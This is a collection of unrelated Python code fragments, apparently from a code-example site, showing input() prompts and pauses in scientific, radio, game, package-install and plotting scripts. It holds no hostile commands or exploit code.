        elif self._configuration['sql_type'] == 'MySQL':
            self._configuration['sql_connection_string'] = 'mysql+pymysql://' + self._configuration['user'] + ':' \
                                                           + self._configuration['sql_user_key'] + '@' \
                                                           + self._configuration['sql_host'] \
                                                           + '/' + self._configuration['sql_database']
        else:
            # SQLite is raising ugly error messages when the database directory does not exist.
            if self._configuration['sql_file'] is None:
                self._configuration['sql_file'] = '/'.join([self._configuration['resource_paths'][0], 'sqlite.db'])
            if os.path.dirname(self._configuration['sql_file']) != '' and \
                    not os.path.exists(os.path.dirname(self._configuration['sql_file'])):
                os.makedirs(os.path.dirname(self._configuration['sql_file']))
            self._configuration['sql_connection_string'] = 'sqlite:///' + \
                                                           self._configuration['sql_file'].replace('\\', '/')

        self._database = None
        self._use_local_database = False
        self._queue_adapter = None
        self._queue_adapter = self._init_queue_adapter(resource_path_lst=self._configuration['resource_paths'])
        self.logger = setup_logger()
        self._publication_lst = {}
        self.publication_add(self.publication)
Example #37
and then recall them to test the data pickling mechanism

>>> data = dump.read(filename, f)
>>> newPhase = data['phase']
>>> newTheta = data['theta']
>>> newThetaEq = buildThetaEquation(newPhase, newTheta)
>>> newPhaseEq = buildPhaseEquation(newPhase, newTheta)

and finish the iterations,

>>> from builtins import range
>>> for i in range(steps // 2):
...     newTheta.updateOld()
...     newThetaEq.solve(newTheta, dt=timeStepDuration, solver=GeneralSolver(iterations=2000, tolerance=1e-15))
...     newPhaseEq.solve(newPhase, dt=timeStepDuration, solver=GeneralSolver(iterations=2000, tolerance=1e-15))

The solution is compared against Ryo Kobayashi's test data

>>> print(newTheta.allclose(testData, rtol=1e-7))
1
"""
from __future__ import unicode_literals
from builtins import input
__docformat__ = 'restructuredtext'

if __name__ == '__main__':
    import fipy.tests.doctestPlus
    exec(fipy.tests.doctestPlus._getScript())

    input('finished')
Example #38
File: util.py  Project: zhuzhenping/rlpy
def pause():
    """
    Pauses the output stream awaiting user feedback.
    """
    print("<Press enter/return to continue>")
    input()
Example #39
    def setup(self, options):
        ModTool.setup(self, options)

        if self._info['blockname'] is None:
            if len(options) >= 2:
                self._info['blockname'] = options[1]
            else:
                self._info['blockname'] = input(
                    "Enter name of block/code (without module name prefix): ")
        if os.path.isfile("./lib/" + self._info['blockname'] +
                          "_impl.cc") or os.path.isfile(
                              "./python/" + self._info['blockname'] + ".py"):
            raise ModToolException('The given blockname already exists!')
        if not re.match('[a-zA-Z0-9_]+', self._info['blockname']):
            raise ModToolException('Invalid block name.')
        print("Block/code identifier: " + self._info['blockname'])
        self._info['fullblockname'] = self._info['modname'] + '_' + self._info[
            'blockname']

        self._info['blocktype'] = options.block_type
        if self._info['blocktype'] is None:
            # Print list out of blocktypes to user for reference
            print(str(self._block_types))
            with SequenceCompleter(sorted(self._block_types)):
                while self._info['blocktype'] not in self._block_types:
                    self._info['blocktype'] = input("Enter block type: ")
                    if self._info['blocktype'] not in self._block_types:
                        print('Must be one of ' + str(self._block_types))

        # Allow user to specify language interactively if not set
        self._info['lang'] = options.lang
        if self._info['lang'] is None:
            language_candidates = ('c++', 'cpp', 'python')
            with SequenceCompleter(language_candidates):
                while self._info['lang'] not in language_candidates:
                    self._info['lang'] = input("Language (python/cpp): ")
        if self._info['lang'] == 'c++':
            self._info['lang'] = 'cpp'

        print("Language: %s" % {
            'cpp': 'C++',
            'python': 'Python'
        }[self._info['lang']])

        if ((self._skip_subdirs['lib'] and self._info['lang'] == 'cpp') or
            (self._skip_subdirs['python'] and self._info['lang'] == 'python')):
            raise ModToolException('Missing or skipping relevant subdir.')

        if self._info['blockname'] is None:
            self._info['blockname'] = input(
                "Enter name of block/code (without module name prefix): ")
        if not re.match('[a-zA-Z0-9_]+', self._info['blockname']):
            raise ModToolException('Invalid block name.')
        print("Block/code identifier: " + self._info['blockname'])
        self._info['fullblockname'] = self._info['modname'] + '_' + self._info[
            'blockname']
        if not options.license_file:
            self._info['copyrightholder'] = options.copyright
            if self._info['copyrightholder'] is None:
                user = getpass.getuser()
                git_user = self.scm.get_gituser()
                if git_user:
                    copyright_candidates = (user, git_user, 'GNU Radio')
                else:
                    copyright_candidates = (user, 'GNU Radio')
                with SequenceCompleter(copyright_candidates):
                    self._info['copyrightholder'] = input(
                        "Please specify the copyright holder: ")
                    if not self._info['copyrightholder'] or self._info[
                            'copyrightholder'].isspace():
                        self._info['copyrightholder'] = "gr-" + self._info[
                            'modname'] + " author"
            elif self._info['is_component']:
                print(
                    "For GNU Radio components the FSF is added as copyright holder"
                )
        self._license_file = options.license_file
        self._info['license'] = self.setup_choose_license()
        if options.argument_list is not None:
            self._info['arglist'] = options.argument_list
        else:
            self._info['arglist'] = input(
                'Enter valid argument list, including default arguments: ')

        if not (self._info['blocktype'] in ('noblock',)
                or self._skip_subdirs['python']):
            self._add_py_qa = options.add_python_qa
            if self._add_py_qa is None:
                self._add_py_qa = ask_yes_no('Add Python QA code?', True)
        if self._info['lang'] == 'cpp':
            self._add_cc_qa = options.add_cpp_qa
            if self._add_cc_qa is None:
                self._add_cc_qa = ask_yes_no('Add C++ QA code?',
                                             not self._add_py_qa)
        self._skip_cmakefiles = options.skip_cmakefiles
        if self._info['version'] == 'autofoo' and not self._skip_cmakefiles:
            print("Warning: Autotools modules are not supported. ",
                  "Files will be created, but Makefiles will not be edited.")
            self._skip_cmakefiles = True
Example #40
rand_data = all_rand_data[idx_rdn_data, :]
init_cond = cond_std * rand_data + cond_mean
joint_pos = np.deg2rad(init_cond[:3])

env_condition = np.zeros(env.obs_dim)
env_condition[:env.action_dim] = joint_pos
# env_condition[obst_idx] = init_cond[3:]

# Temporally hack for getting ee _object
env.add_custom_init_cond(env_condition)
env.reset(condition=-1)
# obs = self.env.get_observation()
des_tgt = env.get_ee_pose()
env.clear_custom_init_cond(-1)

env_condition[:3] = np.deg2rad(init_joint_pos)
env_condition[tgt_idx] = des_tgt
env_condition[obst_idx] = init_cond[3:]

# Now add the target properly
print('INIT COND', env_condition)
env.add_custom_init_cond(env_condition)

input('adsfkhk')

print("Environment:%s OK!." % type(env).__name__)

env.reset()

input('Press key to close')
Example #41
    def run(self, agent_host):
        """run the agent on the world"""

        total_reward = 0
        current_r = 0
        tol = 0.01
        
        self.prev_s = None
        self.prev_a = None
        
        # wait for a valid observation
        world_state = agent_host.peekWorldState()
        while world_state.is_mission_running and all(e.text=='{}' for e in world_state.observations):
            world_state = agent_host.peekWorldState()
        # wait for a frame to arrive after that
        num_frames_seen = world_state.number_of_video_frames_since_last_state
        while world_state.is_mission_running and world_state.number_of_video_frames_since_last_state == num_frames_seen:
            world_state = agent_host.peekWorldState()
        world_state = agent_host.getWorldState()
        for err in world_state.errors:
            print(err)

        if not world_state.is_mission_running:
            return 0 # mission already ended
            
        assert len(world_state.video_frames) > 0, 'No video frames!?'
        
        obs = json.loads( world_state.observations[-1].text )
        prev_x = obs[u'XPos']
        prev_z = obs[u'ZPos']
        print('Initial position:',prev_x,',',prev_z)
        
        if save_images:
            # save the frame, for debugging
            frame = world_state.video_frames[-1]
            image = Image.frombytes('RGB', (frame.width, frame.height), bytes(frame.pixels) )
            iFrame = 0
            self.rep = self.rep + 1
            image.save( 'rep_' + str(self.rep).zfill(3) + '_saved_frame_' + str(iFrame).zfill(4) + '.png' )
            #image.save('rep_' + str(self.rep).zfill(10) + '_saved_frame_' + str(iFrame).zfill(10) + '.png')
            
        # take first action
        total_reward += self.act(world_state,agent_host,current_r)
        
        require_move = True
        check_expected_position = False
        
        # main loop:
        while world_state.is_mission_running:
        
            # wait for the position to have changed and a reward received
            print('Waiting for data...', end=' ')
            while True:
                world_state = agent_host.peekWorldState()
                if not world_state.is_mission_running:
                    print('mission ended.')
                    break
                if len(world_state.rewards) > 0 and not all(e.text=='{}' for e in world_state.observations):
                    obs = json.loads( world_state.observations[-1].text )
                    curr_x = obs[u'XPos']
                    curr_z = obs[u'ZPos']
                    if require_move:
                        if math.hypot( curr_x - prev_x, curr_z - prev_z ) > tol:
                            print('received.')
                            break
                        else:
                            print('Walked into wall.')
                            total_reward -= 3
                            break
                    else:
                        print('received.')
                        break
            # wait for a frame to arrive after that
            num_frames_seen = world_state.number_of_video_frames_since_last_state
            while world_state.is_mission_running and world_state.number_of_video_frames_since_last_state == num_frames_seen:
                world_state = agent_host.peekWorldState()
                
            num_frames_before_get = len(world_state.video_frames)
            
            world_state = agent_host.getWorldState()
            for err in world_state.errors:
                print(err)
            current_r = sum(r.getValue() for r in world_state.rewards)

            if save_images:
                # save the frame, for debugging
                if world_state.is_mission_running:
                    assert len(world_state.video_frames) > 0, 'No video frames!?'
                    frame = world_state.video_frames[-1]
                    image = Image.frombytes('RGB', (frame.width, frame.height), bytes(frame.pixels) )
                    iFrame = iFrame + 1
                    image.save( 'rep_' + str(self.rep).zfill(3) + '_saved_frame_' + str(iFrame).zfill(4) + '_after_' + self.actions[self.prev_a] + '.png' )
                
            if world_state.is_mission_running:
                assert len(world_state.video_frames) > 0, 'No video frames!?'
                num_frames_after_get = len(world_state.video_frames)
                assert num_frames_after_get >= num_frames_before_get, 'Fewer frames after getWorldState!?'
                frame = world_state.video_frames[-1]
                obs = json.loads( world_state.observations[-1].text )
                curr_x = obs[u'XPos']
                curr_z = obs[u'ZPos']
                print('New position from observation:',curr_x,',',curr_z,'after action:',self.actions[self.prev_a], end=' ') #NSWE
                if check_expected_position:
                    expected_x = prev_x + [0,0,-1,1][self.prev_a]
                    expected_z = prev_z + [-1,1,0,0][self.prev_a]
                    if math.hypot( curr_x - expected_x, curr_z - expected_z ) > tol:
                        print(' - ERROR DETECTED! Expected:',expected_x,',',expected_z)
                        input("Press Enter to continue...")
                    else:
                        print('as expected.')
                    curr_x_from_render = frame.xPos
                    curr_z_from_render = frame.zPos
                    print('New position from render:',curr_x_from_render,',',curr_z_from_render,'after action:',self.actions[self.prev_a], end=' ') #NSWE
                    if math.hypot( curr_x_from_render - expected_x, curr_z_from_render - expected_z ) > tol:
                        print(' - ERROR DETECTED! Expected:',expected_x,',',expected_z)
                        input("Press Enter to continue...")
                    else:
                        print('as expected.')
                else:
                    print()
                prev_x = curr_x
                prev_z = curr_z
                # act
                total_reward += self.act(world_state, agent_host, current_r)
                
        # process final reward
        self.logger.debug("Final reward: %d" % current_r)
        total_reward += current_r

        # update Q values
        if self.training and self.prev_s is not None and self.prev_a is not None:
            old_q = self.q_table[self.prev_s][self.prev_a]
            self.q_table[self.prev_s][self.prev_a] = old_q + self.alpha * ( current_r - old_q )

        # Save q_table:
        with open(q_tableFile, 'w') as outfile:
            json.dump(self.q_table, outfile)
            
        self.drawQ()
    
        return total_reward
Example #42
            self.board[pos] = PLAYER


if __name__ == "__main__":
    if 'hard' in ''.join(sys.argv[1:]).lower():
        first, second = COMPUTER, PLAYER
    else:
        first, second = PLAYER, COMPUTER

    while True:
        game = TicTacToe()

        turns = itertools.cycle([first, second])
        print(game)
        for _ in VALID_POSITIONS:
            player = next(turns)
            if player == COMPUTER:
                game.ai_move()
            else:
                game.manual_move()
            print(game)
            if game.is_win():
                print('Player {} wins'.format(player))
                break
        else:  # for / else is frowned upon, I do like it here though!
            print('Draw')

        if 'n' in input('Do you want to play again? [yn] ').lower():
            print('Goodbye')
            break
Example #43
from models.MarketItem import MarketItem
from models.GameLevel import GameLevel
from models.User import User, ADMIN_PERMISSION
from tornado.options import options

# Fills the database with some startup data.
password = ""

if options.setup.lower().startswith("dev") or options.setup.lower().startswith(
        "docker"):
    admin_handle = "admin"
    password = "******"
    print("Admin Username: %s, Password: %s" % (admin_handle, password))
else:
    admin_handle = str(
        input(PROMPT + "RootTheBox Admin Username [admin]: ")) or "admin"
    sys.stdout.write(PROMPT + "New Admin ")
    sys.stdout.flush()
    password1 = getpass.getpass()
    sys.stdout.write(PROMPT + "Confirm New Admin ")
    sys.stdout.flush()
    password2 = getpass.getpass()
    if password1 == password2 and len(
            password1) >= options.min_user_password_length:
        password = password1
    else:
        print(WARN +
              "Error: Passwords did not match, or was less than %d chars" %
              (options.min_user_password_length, ))
        os._exit(1)
Example #44
    9. / 255., 24. / 255., 55. / 255., 87. / 255., 118. / 255., 150. / 255.,
    180. / 255., 200. / 255., 222. / 255.
][::-1])
blue = numpy.array([
    30. / 255., 96. / 255., 112. / 255., 114. / 255., 112. / 255., 101. / 255.,
    72. / 255., 35. / 255., 0. / 255.
][::-1])
ROOT.TColor.CreateGradientColorTable(9, stops, red, green, blue, 255, 1)

labels = ROOT.TLatex()
#labels.SetTextSize(0.04)

lines = ROOT.TLine()
lines.SetLineWidth(2)

pad1 = ROOT.TPad("pad1", "", 0.0, 0.0, 1.0, 1.0)
pad1.Draw()
pad1.cd()
hist.Draw("colz")
labels.DrawLatex(1800, 45, "%ddp" % nDoublePlanes)

for i in [1, 2, 3, 4]:
    cut = tparfile.Get("R3BNeulandNeutron2DPar").GetNeutronCut(i)
    w = cut.IntegralHist(hist)
    labels.DrawLatex(70, i * 11 - 7, "%2d%%" % (w / 100))
    cut.Draw("same")

canvas.SaveAs(outfile)

input("Press enter to continue...")
Example #45
def pirate_main(args):
    printer = Printer(args.color)

    # print version
    if args.version:
        printer.print('pirate-get, version {}'.format(pirate.data.version))
        sys.exit(0)

    # check if transmission is running
    if args.transmission:
        ret = subprocess.call(args.transmission_command + ['-l'],
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL)
        if ret != 0:
            printer.print('Transmission is not running.')
            sys.exit(1)

    # non-torrent fetching actions

    if args.action == 'list_categories':
        cur_color = 'zebra_0'
        for key, value in sorted(pirate.data.categories.items()):
            cur_color = 'zebra_0' if cur_color == 'zebra_1' else 'zebra_1'
            printer.print(str(value), '\t', key, sep='', color=cur_color)
        return

    if args.action == 'list_sorts':
        cur_color = 'zebra_0'
        for key, value in sorted(pirate.data.sorts.items()):
            cur_color = 'zebra_0' if cur_color == 'zebra_1' else 'zebra_1'
            printer.print(str(value), '\t', key, sep='', color=cur_color)
        return

    # fetch torrents

    if args.source == 'local_tpb':
        results = pirate.local.search(args.database, args.search)
    elif args.source == 'tpb':
        try:
            results, site = search_mirrors(printer, args)
        except IOError as e:
            printer.print(e.args[0] + ' :( ', color='ERROR')
            if len(e.args) > 1:
                printer.print(e.args[1])
            sys.exit(1)

    if len(results) == 0:
        printer.print('No results')
        return

    printer.search_results(results, local=args.source == 'local_tpb')

    # number of results to pick
    if args.first:
        printer.print('Choosing first result')
        choices = [0]
    elif args.download_all:
        printer.print('Downloading all results')
        choices = range(len(results))
    else:
        # interactive loop for per-torrent actions
        while True:
            printer.print("\nSelect links (Type 'h' for more options"
                          ", 'q' to quit)", end='\b', color='alt')
            try:
                l = builtins.input(': ')
            except (KeyboardInterrupt, EOFError):
                printer.print('\nCancelled.')
                return

            try:
                code, choices = parse_torrent_command(l)
                # Act on option, if supplied
                printer.print('')
                if code == 'h':
                    printer.print('Options:',
                                  '<links>: Download selected torrents',
                                  '[m<links>]: Save magnets as files',
                                  '[t<links>]: Save .torrent files',
                                  '[d<links>]: Get descriptions',
                                  '[f<links>]: Get files',
                                  '[p] Print search results',
                                  '[q] Quit', sep='\n')
                elif code == 'q':
                    printer.print('Bye.', color='alt')
                    return
                elif code == 'd':
                    printer.descriptions(choices, results, site)
                elif code == 'f':
                    printer.file_lists(choices, results, site)
                elif code == 'p':
                    printer.search_results(results)
                elif code == 'm':
                    pirate.torrent.save_magnets(printer, choices, results,
                                                args.save_directory)
                elif code == 't':
                    pirate.torrent.save_torrents(printer, choices, results,
                                                 args.save_directory)
                elif not l:
                    printer.print('No links entered!', color='WARN')
                else:
                    break
            except Exception as e:
                printer.print('Exception:', e, color='ERROR')
                return

    # output

    if args.output == 'save_magnet_files':
        printer.print('Saving selected magnets...')
        pirate.torrent.save_magnets(printer, choices, results,
                                    args.save_directory)
        return

    if args.output == 'save_torrent_files':
        printer.print('Saving selected torrents...')
        pirate.torrent.save_torrents(printer, choices, results,
                                     args.save_directory)
        return

    for choice in choices:
        url = results[choice]['magnet']

        if args.output == 'transmission':
            subprocess.call(args.transmission_command + ['--add', url])
        elif args.output == 'open_command':
            cmd = parse_cmd(args.open_command, url)
            printer.print(" ".join(cmd))
            subprocess.call(cmd)
        elif args.output == 'browser_open':
            webbrowser.open(url)

    if args.output == 'transmission':
        subprocess.call(args.transmission_command + ['-l'])
Example #46
def install(package, hash=None, version=None, tag=None, force=False):
    """
    Download a Quilt data package from the server and install locally.

    At most one of `hash`, `version`, or `tag` can be given. If none are
    given, `tag` defaults to "latest".
    """
    if hash is version is tag is None:
        tag = LATEST_TAG

    assert [hash, version, tag].count(None) == 2
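    # At this point exactly one of hash / version / tag is set: the chained
    # "is" comparison above is True only when all three are None, in which
    # case the tag falls back to "latest"; the assert checks that invariant.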

    owner, pkg = _parse_package(package)
    session = _get_session()
    store = PackageStore()
    existing_pkg = store.get_package(owner, pkg)

    if existing_pkg is not None and not force:
        print("{owner}/{pkg} already installed.".format(owner=owner, pkg=pkg))
        overwrite = input("Overwrite? (y/n) ")
        if overwrite.lower() != 'y':
            return

    if version is not None:
        response = session.get(
            "{url}/api/version/{owner}/{pkg}/{version}".format(
                url=QUILT_PKG_URL,
                owner=owner,
                pkg=pkg,
                version=version
            )
        )
        pkghash = response.json()['hash']
    elif tag is not None:
        response = session.get(
            "{url}/api/tag/{owner}/{pkg}/{tag}".format(
                url=QUILT_PKG_URL,
                owner=owner,
                pkg=pkg,
                tag=tag
            )
        )
        pkghash = response.json()['hash']
    else:
        pkghash = hash
    assert pkghash is not None

    response = session.get(
        "{url}/api/package/{owner}/{pkg}/{hash}".format(
            url=QUILT_PKG_URL,
            owner=owner,
            pkg=pkg,
            hash=pkghash
        )
    )
    assert response.ok # other responses handled by _handle_response

    dataset = response.json(object_hook=decode_node)
    response_urls = dataset['urls']
    response_contents = dataset['contents']

    # Verify contents hash
    if pkghash != hash_contents(response_contents):
        raise CommandException("Mismatched hash. Try again.")

    pkgobj = store.install_package(owner, pkg, response_contents)

    total = len(response_urls)
    for idx, (download_hash, url) in enumerate(sorted(iteritems(response_urls))):
        print("Downloading %s (%d/%d)..." % (download_hash, idx + 1, total))

        local_filename = store.object_path(download_hash)
        if os.path.exists(local_filename):
            file_hash = digest_file(local_filename)
            if file_hash == download_hash:
                print("Fragment already installed; skipping.")
                continue
            else:
                print("Fragment already installed, but has the wrong hash (%s); re-downloading." %
                      file_hash)

        response = requests.get(url, stream=True)
        if not response.ok:
            msg = "Download {hash} failed: error {code}"
            raise CommandException(msg.format(hash=download_hash, code=response.status_code))

        length_remaining = response.raw.length_remaining

        temp_path = store.temporary_object_path(download_hash)
        with open(temp_path, 'wb') as output_file:
            with tqdm(total=length_remaining, unit='B', unit_scale=True) as progress:
                # `requests` will automatically un-gzip the content, as long as
                # the 'Content-Encoding: gzip' header is set.
                # To report progress, however, we need the length of the original compressed data;
                # we use the undocumented but technically public `response.raw.length_remaining`.
                for chunk in response.iter_content(chunk_size=CHUNK_SIZE):
                    if chunk: # filter out keep-alive new chunks
                        output_file.write(chunk)
                    if response.raw.length_remaining is not None:  # Not set in unit tests.
                        progress.update(length_remaining - response.raw.length_remaining)
                        length_remaining = response.raw.length_remaining

        file_hash = digest_file(temp_path)
        if file_hash != download_hash:
            os.remove(temp_path)
            raise CommandException("Fragment hashes do not match: expected %s, got %s." %
                                   (download_hash, file_hash))

        os.rename(temp_path, local_filename)

    pkgobj.save_contents()
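
# A minimal usage sketch (the package name is hypothetical), assuming install()
# is importable as defined above:
#
#     install("example_user/example_pkg")                 # installs the "latest" tag
#     install("example_user/example_pkg", version="1.0")  # or pin a version, tag, or hash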
Example #47
def visualize(segments, extra_info=None, show_all=False, no_ticks=False):
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    # scale the axes to match for all the segments
    axes_min = np.array(np.min(segments[0], axis=0))
    axes_max = np.array(np.max(segments[0], axis=0))

    for seg in segments[1:]:
        axes_min = np.minimum(axes_min, np.min(seg, axis=0))
        axes_max = np.maximum(axes_max, np.max(seg, axis=0))

    # display segments
    fig_id = 1
    plt.ion()
    for i, seg in enumerate(segments):
        if show_all:
            fig_id = i + 1

        fig = plt.figure(fig_id)
        plt.clf()
        ax = fig.add_subplot(111, projection="3d")

        ax.set_xlim(axes_min[0], axes_max[0])
        ax.set_ylim(axes_min[1], axes_max[1])
        ax.set_zlim(axes_min[2], axes_max[2])

        if no_ticks:
            tick_count = 3
            ax.set_xticks(
                np.linspace(axes_min[0], axes_max[0], tick_count + 2)[1:-1])
            ax.set_yticks(
                np.linspace(axes_min[1], axes_max[1], tick_count + 2)[1:-1])
            ax.set_zticks(
                np.linspace(axes_min[2], axes_max[2], tick_count + 2)[1:-1])

            plt.setp(ax.get_xmajorticklabels(), visible=False)
            plt.setp(ax.get_ymajorticklabels(), visible=False)
            plt.setp(ax.get_zmajorticklabels(), visible=False)

        ax.scatter(seg[:, 0], seg[:, 1], seg[:, 2])

        info = "Segment " + str(i)
        if extra_info is not None:
            info = info + " " + str(extra_info[i])
        sys.stdout.write(info)

        fig.canvas.flush_events()

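        # Wait for a key press before showing the next segment; entering 'q'
        # stops early.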
        if not show_all:
            key = input()
            if key == "q":
                break
        else:
            sys.stdout.write("\n")

    if show_all:
        input()

    plt.ioff()
    plt.close("all")
Example #48
d = parcnsdl.ConvBPDNDictLearn_Consensus(D0, sh, lmbda, opt)
D1 = d.solve()
print("ConvBPDNDictLearn_Consensus solve time: %.2fs" %
      d.timer.elapsed('solve'))


"""
Display initial and final dictionaries.
"""

D1 = D1.squeeze()
fig = plot.figure(figsize=(14, 7))
plot.subplot(1, 2, 1)
plot.imview(util.tiledict(D0), fig=fig, title='D0')
plot.subplot(1, 2, 2)
plot.imview(util.tiledict(D1), fig=fig, title='D1')
fig.show()


"""
Get iterations statistics from solver object and plot functional value
"""

its = d.getitstat()
plot.plot(its.ObjFun, xlbl='Iterations', ylbl='Functional')


# Wait for enter on keyboard
input()
Example #49
                "dhclient", "-d",
                "br%d" % j, "-cf",
                "/tmp/dhcp_%d_%d/dhclient.conf" % (host_id, j), "-lf",
                "/tmp/dhcp_%d_%d/dhclient.lease" % (host_id, j)
            ]
            d_client.append(Popen(cmd, stdout=PIPE, stderr=PIPE))

            # make sure we get address for eth0
            retry = -1
            while retry < 0:
                check = Popen(
                    ["ip", "addr", "show", "br%d" % j],
                    stdout=PIPE,
                    stderr=PIPE)
                out = check.stdout.read().decode()  # decode bytes so find() can match the address below
                checkip = "99.1.%d" % j
                retry = out.find(checkip)


try:
    run()
    input("")
finally:
    for v in ifc_gc:
        call(["ip", "link", "del", v])
    ipdb.release()
    for p in d_client:
        p.kill()
    for p in d_serv:
        p.kill()
Example #50
def visualize_side_by_side(segments, extra_info=None, show_all=False):

    import matplotlib.cm as cm

    n_views = 6.0
    if len(segments) < n_views:
        return

    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    # scale the axes to match for all the segments
    axes_min = np.array(np.min(segments[0], axis=0))
    axes_max = np.array(np.max(segments[0], axis=0))
    max_range = 0
    for seg in segments[1:]:
        axes_min = np.minimum(axes_min, np.min(seg, axis=0))
        axes_max = np.maximum(axes_max, np.max(seg, axis=0))
        X = seg[:, 0]
        Y = seg[:, 1]
        Z = seg[:, 2]
        new_max_range = np.array([X.max() - X.min(),
                                  Y.max() - Y.min()]).max() / 2.0
        if new_max_range > max_range:
            max_range = new_max_range
    fig = plt.figure(1, frameon=False)
    plt.clf()
    cmap = plt.cm.jet
    # fig, axs = plt.subplots(1,len(segments), projection='3d', facecolor='w', edgecolor='w') #figsize=(15, 6)
    fig.subplots_adjust(hspace=.5, wspace=.001)

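    # Down-sample to roughly n_views evenly spaced segments (first and last
    # included) for the side-by-side display.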
    views_ids = [0]
    segments_temp = []
    for i in range(int(n_views - 1)):
        idx = i * len(segments) / n_views
        print(idx)
        views_ids = views_ids + [int(idx)]
        segments_temp.append(segments[int(idx)])
    segments_temp.append(segments[len(segments) - 1])
    segments = segments_temp

    print(max_range)

    for i, seg in enumerate(segments):
        ax = fig.add_subplot(1, len(segments), i + 1, projection="3d")
        ax.set_xlim(axes_min[0], axes_max[0])
        ax.set_ylim(axes_min[1], axes_max[1])
        ax.set_zlim(axes_min[2], axes_max[2])

        mid_x = (seg[:, 0].max() + seg[:, 0].min()) * 0.5
        mid_y = (seg[:, 1].max() + seg[:, 1].min()) * 0.5
        mid_z = (seg[:, 2].max() + seg[:, 2].min()) * 0.5
        ax.set_xlim(mid_x - max_range, mid_x + max_range)
        ax.set_ylim(mid_y - max_range, mid_y + max_range)
        ax.set_zlim(mid_z - max_range, mid_z + max_range)
        ax.set_aspect(1)

        plt.setp(ax.get_xmajorticklabels(), visible=False)
        plt.setp(ax.get_ymajorticklabels(), visible=False)
        plt.setp(ax.get_zmajorticklabels(), visible=False)

        tick_count = 3
        ax.set_xticks(
            np.linspace(axes_min[0], axes_max[0], tick_count + 2)[1:-1])
        ax.set_yticks(
            np.linspace(axes_min[1], axes_max[1], tick_count + 2)[1:-1])
        ax.set_zticks(
            np.linspace(axes_min[2], axes_max[2], tick_count + 2)[1:-1])

        ax.set_xticklabels([1, 2, 3, 4])
        # fig.patch.set_visible(False)
        # ax.axis('off')
        ax.scatter(
            seg[:, 0],
            seg[:, 1],
            seg[:, 2],
            s=1,
            c=seg[:, 2],
            marker="o",
            lw=0,
            depthshade=False,
            cmap="jet_r",
        )
        ax.grid(b=False)
        ax.patch.set_facecolor("white")
        ax.set_axis_off()
    plt.draw()
    plt.pause(0.001)

    key = input()
Example #51
def main(ini_path=None,
         overwrite_flag=False,
         delay_time=0,
         gee_key_file=None,
         max_ready=-1,
         cron_flag=False,
         reverse_flag=False,
         update_flag=False):
    """Compute scene Tcorr images by WRS2 tile

    Parameters
    ----------
    ini_path : str
        Input file path.
    overwrite_flag : bool, optional
        If True, overwrite existing files if the export dates are the same and
        generate new images (but with different export dates) even if the tile
        lists are the same.  The default is False.
    delay_time : float, optional
        Delay time in seconds between starting export tasks (or checking the
        number of queued tasks, see "max_ready" parameter).  The default is 0.
    gee_key_file : str, None, optional
        Earth Engine service account JSON key file (the default is None).
    max_ready: int, optional
        Maximum number of queued "READY" tasks.  The default is -1, which
        implies no limit to the number of tasks that will be submitted.
    cron_flag: bool, optional
        Not currently implemented.
    reverse_flag : bool, optional
        If True, process WRS2 tiles and dates in reverse order.
    update_flag : bool, optional
        If True, only overwrite scenes with an older model version.

    """
    logging.info('\nCompute scene Tcorr images by WRS2 tile')

    ini = utils.read_ini(ini_path)

    model_name = 'SSEBOP'
    # model_name = ini['INPUTS']['et_model'].upper()

    tmax_name = ini[model_name]['tmax_source']

    export_id_fmt = 'tcorr_scene_{product}_{scene_id}'
    asset_id_fmt = '{coll_id}/{scene_id}'

    tcorr_scene_coll_id = '{}/{}_scene'.format(ini['EXPORT']['export_coll'],
                                               tmax_name.lower())

    wrs2_coll_id = 'projects/earthengine-legacy/assets/' \
                   'projects/usgs-ssebop/wrs2_descending_custom'
    wrs2_tile_field = 'WRS2_TILE'
    wrs2_path_field = 'PATH'
    wrs2_row_field = 'ROW'

    try:
        wrs2_tiles = str(ini['INPUTS']['wrs2_tiles'])
        wrs2_tiles = sorted([x.strip() for x in wrs2_tiles.split(',')])
    except KeyError:
        wrs2_tiles = []
        logging.debug('  wrs2_tiles: not set in INI, defaulting to []')
    except Exception as e:
        raise e

    try:
        study_area_extent = str(ini['INPUTS']['study_area_extent']) \
            .replace('[', '').replace(']', '').split(',')
        study_area_extent = [float(x.strip()) for x in study_area_extent]
    except KeyError:
        study_area_extent = None
        logging.debug('  study_area_extent: not set in INI')
    except Exception as e:
        raise e

    # TODO: Add try/except blocks and default values?
    collections = [x.strip() for x in ini['INPUTS']['collections'].split(',')]
    cloud_cover = float(ini['INPUTS']['cloud_cover'])
    min_pixel_count = float(ini['TCORR']['min_pixel_count'])
    # min_scene_count = float(ini['TCORR']['min_scene_count'])

    if (tmax_name.upper() == 'CIMIS'
            and ini['INPUTS']['end_date'] < '2003-10-01'):
        logging.error(
            '\nCIMIS is not currently available before 2003-10-01, exiting\n')
        sys.exit()
    elif (tmax_name.upper() == 'DAYMET'
          and ini['INPUTS']['end_date'] > '2018-12-31'):
        logging.warning('\nDAYMET is not currently available past 2018-12-31, '
                        'using median Tmax values\n')
        # sys.exit()
    # elif (tmax_name.upper() == 'TOPOWX' and
    #         ini['INPUTS']['end_date'] > '2017-12-31'):
    #     logging.warning(
    #         '\nDAYMET is not currently available past 2017-12-31, '
    #         'using median Tmax values\n')
    #     # sys.exit()

    # Extract the model keyword arguments from the INI
    # Set the property name to lower case and try to cast values to numbers
    model_args = {
        k.lower(): float(v) if utils.is_number(v) else v
        for k, v in dict(ini[model_name]).items()
    }
    # et_reference_args = {
    #     k: model_args.pop(k)
    #     for k in [k for k in model_args.keys() if k.startswith('et_reference_')]}

    logging.info('\nInitializing Earth Engine')
    if gee_key_file:
        logging.info(
            '  Using service account key file: {}'.format(gee_key_file))
        # The "EE_ACCOUNT" parameter is not used if the key file is valid
        ee.Initialize(ee.ServiceAccountCredentials('x', key_file=gee_key_file),
                      use_cloud_api=True)
    else:
        ee.Initialize(use_cloud_api=True)

    # Get a Tmax image to set the Tcorr values to
    logging.debug('\nTmax properties')
    tmax_source = tmax_name.split('_', 1)[0]
    tmax_version = tmax_name.split('_', 1)[1]
    if 'MEDIAN' in tmax_name.upper():
        tmax_coll_id = 'projects/earthengine-legacy/assets/' \
                       'projects/usgs-ssebop/tmax/{}'.format(tmax_name.lower())
        tmax_coll = ee.ImageCollection(tmax_coll_id)
        tmax_mask = ee.Image(tmax_coll.first()).select([0]).multiply(0)
    else:
        # TODO: Add support for non-median tmax sources
        raise ValueError('unsupported tmax_source: {}'.format(tmax_name))
